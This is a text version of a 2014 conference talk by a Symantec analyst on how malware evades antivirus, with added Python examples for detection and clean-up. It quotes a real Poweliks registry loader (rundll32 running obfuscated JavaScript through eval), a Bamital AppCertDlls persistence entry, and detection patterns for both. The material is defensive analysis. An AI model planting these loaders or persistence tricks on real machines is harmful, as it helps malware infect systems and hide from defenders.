CODE BLUE 2014: How to avoid the Detection by Malware, by Hiroshi Shinotsuka (Symantec)

2. Self-introduction
Copyright © 2014 Symantec Corporation
• Threat analysis engineer at Symantec.
• Analyze suspicious files and create Anti-Virus signatures.
• Provide detailed technical descriptions to customers on demand.
• Publicly provide malware-related information.
4. Attacker's techniques to avoid detection
1. Store the decryption key and the data in separate files
2. Large amount of junk code
3. Process protection
4. Store malicious code outside of files (fileless malware)
6. Trojan.Blueso file structure
RAR self-extracting file (13 MB), which contains:
  AutoIt executable file
  Decryption code (script file)
  Decryption key (configuration file)
  Encrypted code
AutoIt is a programming language for the Microsoft Windows platform. The AutoIt syntax is very similar to that of the BASIC programming language, and it is designed to automate the Windows GUI.
The RAR self-extracting file drops the 4 files, then executes the AutoIt script.
7. Decrypted code: Blueso injects Backdoor.Trojan
Diagram: the AutoIt executable holds the code, the decryption key and the encrypted code. After decryption, part of the decrypted code is injected into a legitimate Windows process, and the decrypted code is injected into an Internet Explorer process.
8. Watchdog monitor
Diagram: Create Process, Inject, Create File; whenever a file or a process is deleted, the loop runs again.
Trojan.Blueso recreates the file, registry entry or process if antivirus deletes it.
9. Attacker's techniques to avoid detection (agenda slide repeated)
10. Traditional sample
Packer / self-update
• Harder to detect encrypted files.
• A traditional sample stores all the information in a single file.
Diagram: one file containing code, decryption key and encrypted code is decrypted into code plus decrypted malicious code.
11. New technique to avoid detection
Traditionally, malware saved its decrypted image to a file and executed it. The antivirus scanner detects the malware at the moment it writes its decrypted image onto the disk.
The new technique is to inject the decrypted image into a newly started process and execute it there, in order to avoid detection by the file scan.
Diagram: the AutoIt executable (code, decryption key, encrypted code) decrypts in memory; the decrypted malicious code is injected into a legitimate Windows process.
13. The antivirus scanner scans each file. Why did the attacker split the malware into four separate files?
Diagram: AutoIt executable, decryption code, decryption key (settings file) and encrypted code, each scanned separately.
14. What does this mean?
• Hiding malicious code by encrypting it.
• Store the code, the decryption key and the encrypted code in separate files.
• The antivirus scanner can't determine that the 'encrypted code' is a malicious file.
• The antivirus scanner can't detect the file without understanding the relationships between multiple files.
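A scanner that follows the relationships between the dropped files, as an added example that is not part of the original slides. The four dropped files are stood in by constructed in-memory byte strings; the cipher (repeating XOR), the file names, the use of AutoIt's IniRead()/FileRead() to locate the key and the blob, and the detection strings are all assumptions, since the slides do not disclose Blueso's. Scanning each file on its own finds nothing; reading the key out of the settings file and decrypting the blob in memory, without ever writing it to disk, does.

```python
"""Correlating key, decryptor and encrypted blob across files (added example).

The slides do not disclose Blueso's cipher or file names; repeating XOR and
the names below are assumptions made for this illustration.
"""
import configparser
import re
from itertools import cycle
from typing import Dict


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; stands in for the real (undisclosed) cipher."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Hypothetical detection strings a file scanner would look for in a PE image.
SIGNATURES = [b"MZ", b"This program cannot be run in DOS mode"]


def build_dropped_files() -> Dict[str, bytes]:
    """Constructed stand-ins for the files the SFX archive drops.

    The AutoIt executable itself is omitted: it is a legitimate interpreter.
    """
    key = b"k3y-from-ini"
    payload = (b"MZ\x90\x00" + b"\x00" * 60
               + b"This program cannot be run in DOS mode." + b"\x00" * 16)
    return {
        # decryption code: reads the key from the settings file
        "decrypt.au3": (b"; decryption script\n"
                        b'$key = IniRead("settings.ini", "cfg", "key", "")\n'
                        b'$blob = FileRead("payload.dat")\n'),
        # decryption key: a plain configuration file
        "settings.ini": b"[cfg]\nkey = " + key + b"\n",
        # encrypted code: looks like random bytes on its own
        "payload.dat": xor_bytes(payload, key),
    }


def scan_single_file(data: bytes) -> bool:
    """Per-file scan as on slide 13: each file is judged on its own bytes."""
    return any(sig in data for sig in SIGNATURES)


def correlated_scan(files: Dict[str, bytes]) -> dict:
    """Follow the relationship script -> settings file -> key -> encrypted blob.

    The decrypted image is scanned in memory and never written to disk, which
    is exactly the step a purely file-based scanner never gets to see.
    """
    script = files["decrypt.au3"].decode()
    ini = re.search(r'IniRead\("([^"]+)",\s*"([^"]+)",\s*"([^"]+)"', script)
    blob = re.search(r'FileRead\("([^"]+)"\)', script)
    if not ini or not blob:
        return {"per_file_hits": {}, "decrypted_hit": False}
    cfg = configparser.ConfigParser()
    cfg.read_string(files[ini.group(1)].decode())
    key = cfg[ini.group(2)][ini.group(3)].encode()
    decrypted = xor_bytes(files[blob.group(1)], key)
    return {
        "per_file_hits": {name: scan_single_file(d) for name, d in files.items()},
        "decrypted_hit": scan_single_file(decrypted),
    }


if __name__ == "__main__":
    result = correlated_scan(build_dropped_files())
    print("per-file:", result["per_file_hits"])          # every file clean on its own
    print("after correlation:", result["decrypted_hit"])  # True
```

The point of the correlation step is that the key file and the blob are each harmless under a per-file signature scan; only the scanner that parses the decryptor, follows its reference to the settings file and decrypts the blob in memory sees the PE image. A real implementation would key on the interpreter (AutoIt3.exe launching a script) and the file names it opens rather than on regexes over the script text.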
15. Attacker's techniques to avoid detection (agenda slide repeated)
16. Code (beginning of file)
The TAB character is replaced with a 1-byte string. You only see junk comment lines!
19. Code
Finally, at line 23670, 16 MB in size, the important code is reached.
87476 lines of AutoIt script code. Only 900 lines without the comment lines. Only 1% is important code.
20. Antivirus scan method
• The antivirus scanner needs to balance detection and performance.
• The antivirus scanner first determines the file type and starts the file scan based on the detected file type.
Examples: executable file, ZIP file, JPEG file.
21. No special file structure in text files / script files.
Script files have no file header, which means the files have no special file structure. The antivirus scanner needs to run a partial scan and determine what the file is. It is very difficult to keep scan performance if a malicious script has so many comment/junk code lines.
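A streaming pass that skips the comment padding and reports how much real code a script holds, as an added example that is not part of the original slides. The sample script is constructed (thousands of junk comment lines ahead of a few real ones); the only AutoIt syntax relied on is ';' for line comments and '#cs'/'#ce' ('#comments-start'/'#comments-end') for block comments, and the summary numbers it produces are for that constructed sample, not for the Blueso script on the slides.

```python
"""Finding the 1% of real code in a comment-padded AutoIt script (added example).

The script contents below are constructed; the only AutoIt syntax relied on is
';' for line comments and '#cs'/'#ce' (or '#comments-start'/'#comments-end')
for block comments.
"""
import io
import re
from typing import Iterable

BLOCK_START = re.compile(r"^\s*#(cs|comments-start)\b", re.IGNORECASE)
BLOCK_END = re.compile(r"^\s*#(ce|comments-end)\b", re.IGNORECASE)


def strip_inline_comment(line: str) -> str:
    """Drop a trailing ';' comment, ignoring ';' inside quoted strings."""
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ";":
            return line[:i]
    return line


def summarize(lines: Iterable[str]) -> dict:
    """Stream the script once, line by line, without holding it all in memory.

    Returns the total line count, the number of code lines, the 1-based line
    number at which the first code line appears and the code lines themselves.
    """
    total = 0
    code = []
    first = None
    in_block = False
    for no, raw in enumerate(lines, 1):
        total += 1
        if in_block:
            if BLOCK_END.match(raw):
                in_block = False
            continue
        if BLOCK_START.match(raw):
            in_block = True
            continue
        text = strip_inline_comment(raw).strip()
        if not text:
            continue
        if first is None:
            first = no
        code.append(text)
    ratio = len(code) / total if total else 0.0
    return {"total": total, "code": len(code), "first_code_line": first,
            "ratio": ratio, "lines": code}


def summarize_text(script: str) -> dict:
    """Convenience wrapper for an in-memory script."""
    return summarize(io.StringIO(script))


def build_sample(junk_lines: int = 2000) -> str:
    """Constructed script: thousands of junk comment lines, then a few real ones."""
    junk = "\n".join(f"; {i:08x} junk comment line" for i in range(junk_lines))
    real = "\n".join([
        "#cs",
        "a block comment that a naive grep for IniRead would still have to skip",
        "#ce",
        '$key = IniRead("settings.ini", "cfg", "key", "") ; trailing comment',
        '$blob = FileRead("payload.dat")',
        '$out = BinaryToString($blob) & "; not a comment"',
    ])
    return junk + "\n" + real + "\n"


if __name__ == "__main__":
    s = summarize_text(build_sample())
    print(f"{s['code']} code lines of {s['total']} ({s['ratio']:.2%}), "
          f"first code at line {s['first_code_line']}")
    for line in s["lines"]:
        print("  ", line)
```

Because the pass is a single streaming loop, the cost is linear in the file size and no buffer grows with the comment padding, which is what a scanner needs when the script is tens of megabytes of junk. The code-to-total ratio itself is a usable heuristic: a script where well under one percent of the lines are code is unusual for legitimate automation.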
22. Attacker's techniques to avoid detection (agenda slide repeated)
23. How does Blueso start and protect itself?
Diagram: the AutoIt executable (code, decryption key, encrypted code) decrypts and injects into a legitimate Windows process, which in turn injects into an Internet Explorer process. The Internet Explorer process is labelled "Malware!!", the legitimate Windows process "Malware??", and the question is: what is wrong??
24. Process protection mechanism
1) Terminate Internet Explorer -> the malicious code injected into the legitimate Windows process executes again.
2) Terminate the legitimate Windows process -> the script running in AutoIt executes again.
3) Terminate AutoIt? -> The AutoIt executable is marked as an essential process for the Windows system by using the undocumented API NtSetInformationProcess. As soon as AutoIt is terminated, Windows treats it as an unrecoverable critical problem -> Blue Screen Of Death!!
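The responder's side of this chain, as an added example that is not part of the original slides. The slide names only NtSetInformationProcess; the information class behind the trick, ProcessBreakOnTermination (value 29), the Windows ctypes plumbing and the takedown order are my additions. The process names in the respawn map are hypothetical placeholders for the three processes on the slide. The NT calls are Windows-only and clearing the flag on another process needs SeDebugPrivilege, so run it from an elevated prompt; the pure takedown-order logic runs anywhere.

```python
"""Undoing the 'critical process' trick before tearing down a respawn chain (added example).

The slides name only NtSetInformationProcess; the information class used for
this trick, ProcessBreakOnTermination (29), and the remediation order are
additions. The NT calls are Windows-only and need SeDebugPrivilege to clear
the flag on another process.
"""
import ctypes
import sys
from typing import Dict, List

ProcessBreakOnTermination = 29   # PROCESSINFOCLASS: non-zero ULONG => bugcheck when the process exits
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_SET_INFORMATION = 0x0200
PROCESS_TERMINATE = 0x0001
STATUS_SUCCESS = 0


def _win_libs():
    """Load ntdll/kernel32 and declare the few signatures used below (Windows only)."""
    if sys.platform != "win32":
        raise OSError("NtQuery/NtSetInformationProcess exist only on Windows")
    ntdll = ctypes.WinDLL("ntdll")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    k32.TerminateProcess.argtypes = [ctypes.c_void_p, ctypes.c_uint32]
    ntdll.NtQueryInformationProcess.restype = ctypes.c_long   # NTSTATUS
    ntdll.NtQueryInformationProcess.argtypes = [ctypes.c_void_p, ctypes.c_int,
                                                ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p]
    ntdll.NtSetInformationProcess.restype = ctypes.c_long
    ntdll.NtSetInformationProcess.argtypes = [ctypes.c_void_p, ctypes.c_int,
                                              ctypes.c_void_p, ctypes.c_uint32]
    return ntdll, k32


def is_critical(pid: int) -> bool:
    """True if the process has BreakOnTermination set (killing it bluescreens)."""
    ntdll, k32 = _win_libs()
    h = k32.OpenProcess(PROCESS_QUERY_INFORMATION, 0, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        flag = ctypes.c_uint32(0)
        status = ntdll.NtQueryInformationProcess(h, ProcessBreakOnTermination,
                                                 ctypes.byref(flag), ctypes.sizeof(flag), None)
        if status != STATUS_SUCCESS:
            raise OSError(f"NtQueryInformationProcess failed: NTSTATUS 0x{status & 0xFFFFFFFF:08X}")
        return flag.value != 0
    finally:
        k32.CloseHandle(h)


def clear_critical(pid: int) -> None:
    """Reset BreakOnTermination to 0 so the process can be killed safely (needs SeDebugPrivilege)."""
    ntdll, k32 = _win_libs()
    h = k32.OpenProcess(PROCESS_SET_INFORMATION, 0, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        flag = ctypes.c_uint32(0)
        status = ntdll.NtSetInformationProcess(h, ProcessBreakOnTermination,
                                               ctypes.byref(flag), ctypes.sizeof(flag))
        if status != STATUS_SUCCESS:
            raise OSError(f"NtSetInformationProcess failed: NTSTATUS 0x{status & 0xFFFFFFFF:08X}")
    finally:
        k32.CloseHandle(h)


def takedown_order(respawned_by: Dict[str, str]) -> List[str]:
    """Order processes so none is killed while the process that recreates it still runs.

    respawned_by maps a process to the process that restarts it; roots come first.
    """
    remaining = set(respawned_by) | set(respawned_by.values())
    order: List[str] = []
    while remaining:
        ready = sorted(p for p in remaining if respawned_by.get(p) not in remaining)
        if not ready:
            raise ValueError("respawn graph has a cycle: suspend every process first")
        order.extend(ready)
        remaining.difference_update(ready)
    return order


def remediate(pids: Dict[str, int], respawned_by: Dict[str, str]) -> List[str]:
    """Clear the critical flag where set, then terminate root-first (Windows only)."""
    _, k32 = _win_libs()
    done: List[str] = []
    for name in takedown_order(respawned_by):
        pid = pids[name]
        if is_critical(pid):
            clear_critical(pid)
        h = k32.OpenProcess(PROCESS_TERMINATE, 0, pid)
        if not h:
            raise ctypes.WinError(ctypes.get_last_error())
        try:
            k32.TerminateProcess(h, 1)
        finally:
            k32.CloseHandle(h)
        done.append(name)
    return done


# Hypothetical names for the chain on the slide: IE is respawned by the
# legitimate process, which is respawned by the AutoIt interpreter.
BLUESO_CHAIN = {"iexplore.exe": "legit.exe", "legit.exe": "AutoIt3.exe"}

if __name__ == "__main__":
    print(takedown_order(BLUESO_CHAIN))  # ['AutoIt3.exe', 'legit.exe', 'iexplore.exe']
```

The order matters because of the watchdog on the slide: killing Internet Explorer first only makes the legitimate process re-inject it, and killing the legitimate process first makes AutoIt re-run the script. Killing AutoIt first is only safe once the critical flag is cleared, which is why the query comes before the terminate. A reverse engineer confirming the trick on a live sample can simply call is_critical() on the AutoIt PID.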
26. Attacker's techniques to avoid detection (agenda slide repeated)
27. Example of malware storing code/data in an irregular place (Bamital)
Set a registry entry to start code when Windows restarts:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls "AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"
Because of the analysis already performed, xblscp.dll is determined to be a malicious file. Strictly speaking, does this file have malicious code in it?
28. Example of malware storing code/data in an irregular place (Bamital) 2
How it works
• Allocate memory
• Store the data from the registry into the allocated memory
• Call the allocated memory
The antivirus scanner does not know the data rule. The data is written in the registry. Other malware uses the same technique with a file instead of the registry.
29. Example of malware storing code/data in an irregular place (Poweliks)
Trojan.Poweliks writes a Windows PowerShell script to the registry. You can find that this registry entry may execute encrypted JavaScript. The encrypted code that should be decrypted is in a different registry entry.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-1);}))
"a" = "#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@"
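A decoder for the shifted JavaScript above and a small registry hunt that covers both the Bamital AppCertDlls entry (slide 27) and the Poweliks CLSID entry (slide 29), as an added example that is not part of the original slides. The registry snapshot is a constructed dictionary built from the values printed on the slides plus one benign hypothetical CLSID; nothing reads the live registry. The LocalServer32 value is used as captured on the slide, where two spots are damaged by slide extraction (the token 'S~Se', which should read as the encoded form of RegRead, and the first CLSID group, which lost two characters), so the decoded output is shown with those spots left as they are.

```python
"""Decoding Poweliks' shifted JavaScript and hunting registry-resident loaders (added example).

The registry snapshot is constructed from the values printed on slides 27 and
29 plus one benign entry; nothing here reads the live registry.
"""
import re
from typing import Dict, List, Optional

# LocalServer32 value as captured on slide 29. Two spots are damaged by slide
# extraction and are left as captured: the token 'S~Se' (expected: the encoded
# form of RegRead) and the first CLSID group, which lost two characters.
POWELIKS_LOCALSERVER32 = (
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
    'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)'
    '(XTdsjqu/Tifmm(**/S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]'
    'mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return '
    'String.fromCharCode(_.charCodeAt()-1);}))'
)

# Constructed registry snapshot: value path -> value data.
SNAPSHOT: Dict[str, str] = {
    r"HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default)":
        POWELIKS_LOCALSERVER32,
    # value 'a' under the same key: the JScript.Encode blob, truncated on the slide
    r"HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\a":
        "#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@",
    r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls\AppSecDll":
        r"%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll",
    # benign entry with a hypothetical CLSID that must not be flagged
    r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\LocalServer32\(Default)":
        r"C:\Program Files\Example\example.exe",
}

# Matches eval("<encoded>".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-N);}))
EVAL_RE = re.compile(
    r'eval\("([^"]*)"\.replace\(/\./g,\s*function\(_\)\{return\s+'
    r'String\.fromCharCode\(_\.charCodeAt\(\)-(\d+)\);\}\)\)')


def shift_decode(text: str, delta: int) -> str:
    """Apply the per-character code-point shift the replace() callback performs."""
    return "".join(chr(ord(c) + delta) for c in text)


def decode_poweliks_value(value: str) -> Optional[str]:
    """Return the JavaScript that eval() would actually run, or None if the pattern is absent."""
    m = EVAL_RE.search(value)
    if not m:
        return None
    return shift_decode(m.group(1), -int(m.group(2)))


# Markers for a DLL path under a user profile rather than a system directory.
USER_WRITABLE = ("%user_profile%", "%userprofile%", "\\users\\",
                 "\\documents and settings\\", "\\local settings\\", "appdata")

VALUE_RULES = [
    (re.compile(r"rundll32\.exe\s+javascript:", re.IGNORECASE), "rundll32 launched with a javascript: URL"),
    (re.compile(r"mshtml,RunHTMLApplication", re.IGNORECASE), "mshtml RunHTMLApplication loader"),
    (re.compile(r"\.replace\(/\./g,\s*function", re.IGNORECASE), "per-character decoder feeding eval"),
    (re.compile(r"^#@~\^"), "JScript.Encode blob stored as registry data"),
]


def hunt(snapshot: Dict[str, str]) -> List[dict]:
    """Flag registry values that carry code or load code from an irregular place."""
    findings = []
    for path, value in snapshot.items():
        reasons = [why for rx, why in VALUE_RULES if rx.search(value)]
        if ("\\session manager\\appcertdlls\\" in path.lower()
                and any(marker in value.lower() for marker in USER_WRITABLE)):
            reasons.append("AppCertDlls DLL loaded from a user-writable path")
        if reasons:
            findings.append({"path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(decode_poweliks_value(POWELIKS_LOCALSERVER32))
    for f in hunt(SNAPSHOT):
        print(f["path"])
        for r in f["reasons"]:
            print("   -", r)
```

The decoded value reads document.write('<script language=jscript.encode>' + ... RegRead of the sibling value 'a' ... + '</script>'), which is why the encoded blob lives in a second value under the same key: the LocalServer32 string is only the loader, and the JScript.Encode header (#@~^) on value 'a' is the more stable thing to hunt for. On a live system the snapshot would come from winreg or a reg export, and the AppCertDlls rule should be read as "any entry at all deserves a look", since legitimate ones are rare.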
30. Conclusion
• Attackers discover new techniques every day.
• Attackers employ techniques to make malware removal difficult.
• File-based scanning is no longer effective.
• Multi-layered security is becoming more important.
31. Q & A
32. Thank you!
Hiroshi Shinotsuka
Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Speaker notes: Loading the 32 MB AutoIt script file in the Notepad that ships with Windows took 4 seconds.
For example, if it took 4 seconds before execution when you double-click a file to run it... you cannot wait!